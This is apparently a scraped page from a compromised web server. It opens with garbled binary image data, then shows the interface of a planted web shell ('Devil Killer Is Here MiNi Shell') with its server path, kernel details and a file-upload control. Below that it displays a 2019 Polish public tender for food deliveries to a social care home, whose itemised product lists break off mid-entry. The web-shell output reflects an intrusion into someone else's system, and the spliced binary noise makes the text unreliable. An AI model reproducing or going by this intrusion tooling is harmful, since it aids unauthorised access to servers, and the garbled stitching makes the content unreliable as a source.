JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20191128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20191128/629091-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 629091-N-2019 z dnia 2019-11-28 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Dom Pomocy Społecznej w Szarocinie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocinie</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Dom Pomocy Społecznej w Szarocinie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">23109500700000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Szarocin</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">58-400</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Kamienna Góra</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">dolnośląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">0-75 742 44 20</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">szarocin@post.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">0-75 742 44 20</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.dpsszarocin.wordpress.com</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Jednostki organizacyjne administracji samorządowej</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.dpsszarocin.wordpress.com</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">w formie pisemnej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Dom Pomocy Społecznej w Szarocinie, Szarocin 1, 58-400 Kamienna Góra</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocinie</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">1/D/2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia jest dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocinie.2. Przedmiot zamówienia podzielony został na siedem części:Część 1 Artykuły spożywcze różneCzęść 2 Nabiał i mlekoCzęść 3 PieczywoCzęść 4 Warzywa i owoceCzęść 5 Mięso i wyroby wędliniarskieCzęść 6 Ryby, mrożonki i przetwory warzywno – owocoweCzęść 7 Jaja3. Szczegółowe zestawienie asortymentowe zamawianych artykułów żywnościowych zawarte jest w poniższych tabelach.4. Użyte w załącznikach nazwy własne (towaru lub producenta) oznaczają, iż oferowany artykuł powinien być równoważy do wskazanych, tzn. powinien posiadać porównywalną wartość odżywczą i energetyczną oraz zawartość składników, a także posiadać nie gorsze cechy jakościowe w zakresie wydajności oraz zbliżone walory smakowe.5. Zamawiający na bazie doświadczeń z lat ubiegłych oszacował zapotrzebowanie na wymienione artykuły na okres 12 miesięcy. Ilości te (podane w załącznikach) stanowią wartość szacunkową, co oznacza, że ostateczna ilość zamawiana na podstawie umowy może ulec zmianie.6. Dostawy artykułów żywnościowych odbywać się będą w dni robocze od poniedziałku do soboty, za wyjątkiem dni ustawowo wolnych od pracy, w godzinach od 6°° do godziny 13°°. Miejscem dostawy jest siedziba Zamawiającego (Pałac– kuchnia).7. Zamawiający będzie zamawiał wyroby sukcesywnie, w miarę potrzeb – od poniedziałku do piątku za wyjątkiem dni ustawowo wolnych od pracy w godzinach od 7°°do godziny 13°°.8. Dostawy realizowane będą w partiach, na podstawie zamówień składanych przez Zamawiającego z jednodniowym wyprzedzeniem, elektronicznie na adres e-mail lub numer faks Wykonawcy wskazany w umowie. W zamówieniu Zamawiający każdorazowo określi ilość i rodzaj zamawianego asortymentu.9. Częstotliwość składanych zamówień uzależniona będzie od bieżących potrzeb Zamawiającego i zamawianego asortymentu. Szacuje się, że będzie ona średnio wynosiła: dla części 1, 4, 7 - jeden raz w tygodniu, dla części 5 – dwa razy w tygodniu, dla części 2 – 3 razy w tygodniu, dla części 3 – 6 razy w tygodniu i dla części 6 – wg zapotrzebowania.10. Dostarczane artykuły żywnościowe będące przedmiotem umowy muszą być:- świeże, bardzo dobrej jakości i spełniać wszystkie obowiązujące w tym zakresie normy,- dostarczane w oryginalnych opakowaniach producenta, z etykietą handlową identyfikującą dany artykuł i z podanym na etykiecie terminem przydatności do spożycia (nie dotyczy warzyw i owoców),- dostarczane środkiem transportu spełniającym wymagania sanitarne dotyczące środków transportu żywności.11. Podana w załącznikach waga (gramatura) dotyczy pojedynczego opakowania danego artykułu. Artykuły, dla których określono wagę opakowań nie mogą być dostarczane luzem.12. Artykuły spożywcze powinny posiadać odpowiednio długie okresy (terminy) przydatności do spożycia, stosownie do rodzaju asortymentu.13. W przypadku wykrycia wad zamówionych artykułów spożywczych lub ich niezgodności asortymentowej i ilościowej ze złożonym zamówieniem, Zamawiającemu przysługuje prawo złożenia reklamacji. W przypadku złożenia uzasadnionej reklamacji, Wykonawca zobowiązany jest wymienić niezwłocznie i na własny koszt towar wadliwy na wolny od wad i/lub dostarczyć (uzupełnić) asortyment i ilości zgodnie z zamówieniem.14. Reklamacje mogą być zgłaszane telefonicznie lub pisemnie przez przedstawicieli Zamawiającego wymienionych w umowie. W przypadku pisemnego zgłoszenia reklamacji, Wykonawca zobowiązany jest również pisemnie potwierdzić fakt jej przyjęcia.15. W przypadku wystąpienia trzech udokumentowanych reklamacji, Zamawiający ma prawo do rozwiązania umowy ze skutkiem natychmiastowym.16. W przypadku, gdy Wykonawca nie dostarczy przedmiotu umowy w ustalonych terminach lub gdy wskutek reklamacji nie dokona niezwłocznej wymiany towaru wadliwego na wolny od wad i/lub uzupełnienia asortymentu i ilości, Zamawiający ma prawo dokonać zakupu u innego dostawcy w asortymencie i ilościach odpowiadających niezrealizowanej/niewymienionej dostawie, co będzie skutkować zmniejszeniem ilości przedmiotu umowy o wielkość tego zakupu. 17. W przypadku zaistnienia sytuacji określonej w pkt 16, Wykonawca zobowiązany będzie do zwrotu Zamawiającemu kwoty wynikającej z różnicy pomiędzy ceną zakupu a ceną wynikającą z umowy, po uprzednim przesłaniu do Wykonawcy kopii faktury zakupu danego asortymentu.18. Do obowiązków Wykonawcy, który złoży ofertę najkorzystniejszą na Część 6. Ryby, mrożonki i przetwory warzywno – owocowe, należeć będzie nieodpłatne wyposażenie Zamawiającego w 4 szt. zamrażarek, każda o pojemności 350 litrów - na czas trwania umowy. Powyższe winno być wkalkulowane w cenę oferty.Część 1. Artykuły spożywcze różne 1. Makaron nitki 250 g (4 jajeczny) - 180kg2. Makaron świderki po 2,5 kg z mąki durum - 400kg3. Makaron kolanka po 2,5 kg z mąki durum - 100kg4. Woda mineralna gazowana - butelki 0,5 l - 600l5. Woda mineralna gazowana - butelki 1,5 l - 1500l6. Woda mineralna niegazowana - butelki 0,5 l - 400l7. Sól po 1 kg	- 600kg8. Pasztet z drobiu 160g (typu prochowicki) -400kg9. Pasztet z drobiu 300g (typu prochowicki) - 350kg10. Konserwy mięsne wieprzowe 300g - 350kg11. Pasztet wieprzowy 500g - 50kg12. Ogórek konserwowy po 900 g - 400kg13. Mąka pszenna typ 500 po 1 kg - 200kg14. Mąka tortowa typ 450 po 1 kg - 600kg15. Mąka ziemniaczana po 1 kg - 50kg16. Kasza manna po 1 kg	- 200kg17. Kasza jęczmienna po 1 kg	- 300kg18. Kasza kukurydziana po 0,5 kg - 50kg19. Cukier - wyrób polski - Kategoria I po 1 kg	- 3600kg20. Cukier puder po 0,5 kg - 20kg21. Groszek konserwowy po 400 g - 200kg22. Musztarda po 1 kg - 80kg23. Ocet po 1 l	- 120l24. Olej roślinny (opak. 1 l) - 200l25. Olej roślinny (opak. 3 l) - 300l26. Olej słonecznikowy (opak. 1 l) - 120l27. Miód naturalny po 900 g- PSZCZELI - 100kg28. Dżemy po 280 g - 280kg29. Powidła śliwkowe po 300g - 100kg30. Marmolada wieloowocowa po 1 kg - 60kg31. Masa makowa po 850 g - 20kg32. Brzoskwinie w puszce po 850 g - 20kg33. Wiórki kokosowe po 100 g - 5kg34. Rodzynki po 500 g - 10kg35. Cukier waniliowy po 1 kg - 5kg36. Kwasek cytrynowy po 1 kg - 5kg37. Proszek do pieczenia po 1 kg - 5kg38. Żelatyna po 1 kg - 10kg39. Konserwa makrela w pomidorach po 170 g - 180kg40. Konserwa makrela w oleju po 170 g - 160kg41. Konserwa szprot podwędzany po 170 g - 30kg42. Pieczarki marynowane po 850 g - 70kg43. Płatki kukurydziane po 500 g - 120kg44. Płatki owsiane błyskawiczne po 400 g - 80kg45. Płatki jęczmienne błyskawiczne po 400 g - 30kg46. Ananasy w puszce po 500 g - 30kg47. Napoje owocowe różne gazowane po 1,5 l - 180szt.48. Napoje owocowe różne niegazowane po 1,5 l - 180szt.49. Aromaty do ciast różne po 9 ml - 30szt.50. Soda oczyszczona po 500g - 5kg51. Fasola konserwowa czerwona 400g - 70kg52. Cieciorka konserwowa 400g - 80kg53. Majonez 700 g typu Winiary - 600kg54. Oranżada różna po 1,5 l - 180szt.Część 2. Nabiał i mleko 1. Ser biały półtłusty - 1200kg2. Ser topiony kostka kremowy 100g - 400kg3. Serek homogenizowany po 150 g typu Danio - 600kg4. Śmietana 18% - 800l5. Śmietana 30% - 50l6. Jogurt owocowy po 115 g typu Danon - 500szt.7. Jogurt naturalny po 150 g min. 3% tłuszczu w 100g produktu - 2500szt.8. Jogurt owocowy po 150 g typu Jogobella - 5000szt.9. Masło extra min. 82% tłuszczu zwierzęcego (osełka po 100g) - 200kg10. Masło extra min 82% tłuszczu zwierzęcego pakowane po 1 kg - 50kg11. Masło smakowe typu smaksełko po 100g - 60kg12. Margaryna z masłem do smarowania pieczywa min 5% masła - 900kg13. Margaryna do smarowania pieczywa typu Śniadaniowa, Smakowita maślany smak - 900kg14. Ser żółty (typu gouda) - 150kg15. Ser żółty (typu salami) - 400kg16. Ser żółty typu dziurawiec - 200kg17. Ser żółty typu morski - 50kg18. Ser żółty EDAMSKI - 50kg19. Ser żółty dziurawiec typu RYCKI - 50kg20. Ser żółty typu rolada ustrzycka - 150kg21. Ser żółty wędzony - 50kg22. Margaryna do pieczenia typu KASIA - 100kg23. Margaryna mleczna - 350kg24. Mleko 1l 2% tłuszczu - 6000l25. Maślanka 1l - 200l26. Kefir 380g - 2000szt.27. Serek wiejski 150g - 2000szt.28. Serek kanapkowy po 150 g - 300szt.29. Serek typu mój ulubiony po 450 g - 200szt.30. Deser ryżowy po 150 g - 300szt.31. Deser - kaszka po 150 g - 300szt.32. Deser - serniczek po 150 g - 300szt.33. Serek typu mój ulubiony 200 g - 450szt.34. Ser biały mielony 1 kg - 350kg35. Serek kanapkowy typu Łaciaty 135 g (różne smaki) - 600szt.36. Serek typu Almette 150 g - 240szt.Część 3. Pieczywo 1. Chleb zwykły krojony 600 g - 7000kg2. Chleb z orkiszem krojony 500 g - 350kg3. Chleb typu FITNNESS krojony 500 g - 350kg4. Chleb IG dla diabetyków 500 g - 350kg5. Chleb żytni razowy ze słonecznikiem 500 g - 350kg6. Chleb graham 500 g - 350kg7. Bułka pszenna wrocławska krojona 400 g - 5000kg8. Bułka mała pszenne po 50g - 13000szt.9. Bułka tarta - 100kg10. Bułka słodka z serem 100g - 2500szt.11. Bułka słodka z marmoladą 100g - 1500szt.12. Bułka słodka z jagodami 100g - 500szt.13. Pączki z marmoladą - 200szt.14. Pączki z nadzieniem różanym	- 200szt.15. Rogal zwykły po 90 g - 2000szt.16. Rogal maślany po 50 g - 7000szt.17. Bułka maślana 90g - 2000szt.18. Ciasto – sernik - 100kg19. Ciasto - makowiec - 100kg20. Ciasto - jabłecznik - 100kgCzęść 4 . Warzywa i owoce 1. Burak czerwony - 800kg2. Cebula - 600kg3. Marchew - 2000kg4. Seler - 250kg5. Ziemniaki młode - 4000kg6. Ziemniaki - 11000kg7. Ogórek świeży od 01.01.2020 do 30.06.2020 i od 01.11.2020 do 31.12.2020 - 4000kg8. Ogórek świeży od 01.07.2020 do 31.10.2020 - 6000kg9. Ogórek małosolny - 200kg10. Ogórek kiszony - 300kg11. Kapusta pekińska - 150kg12. Kapusta kiszona - 800kg13. Kapusta biała młoda - 500szt.14. Kapusta biała - 400kg15. Kapusta włoska - 50szt.16. Kapusta czerwona - 120kg17. Sałata zielona - 1300szt.18. Kalafior świeży - 150szt.19. Koper świeży - 1500pęczek20. Pietruszka natka świeża - 1500pęczek21. Jabłka - 4000kg22. Pomidory świeże od 01.01.2020 do 30.06.2020 i od 01.11.2020 do 31.12.2020 - 800kg23. Pomidory świeże od 01.07.2020 do 31.10.2020 - 1000kg24. Pomidor malinowy od 01.07.2020 do 31.10.2020 - 200kg25. Szczypior - 1500pęczek26. Czosnek krajowy - 400szt.27. Pietruszka korzeń - 250kg28. Por - 250kg29. Cytryna - 500kg30. Groch łuskany po 5 kg - 250kg31. Fasola Jasiek po 500 g - 150kg32. Orzech włoski łuskany - 5kg33. Rzodkiewka - 2500pęczek34. Rabarbar - 30kg35. Botwina - 200pęczek36. Brokuł - 50szt.37. Fasolka szparagowa żółta od 01.07.2020 do 31.10.2020 - 50kg38. Fasolka szparagowa zielona od 01.07.2020 do 31.10.2020 - 100kg39. Sałata lodowa - 100szt.40. Pieczarka świeża - 300kgCzęść 5. Mięso i wyroby wędliniarskie 1. Filet z piersi kurczaka - 300kg2. Uda z kurczaka z obciętym grzbietem - 900kg3. Skrzydełko z kurczaka - 50kg4. Porcja rosołowa z kurczaka - 1500kg5. Kurczak świeży - 600kg6. Udziec z indyka b/k - 200kg7. Wątroba wieprzowa - 250kg8. Wołowina - pręga b/k - 50kg9. Wołowina - ligawa b/k - 50kg10. Wołowina b/k pieczeniowa - 100kg11. Wieprzowina - golonka tylna - 50kg12. Wieprzowina - szynka b/k - 800kg13. Wieprzowina - 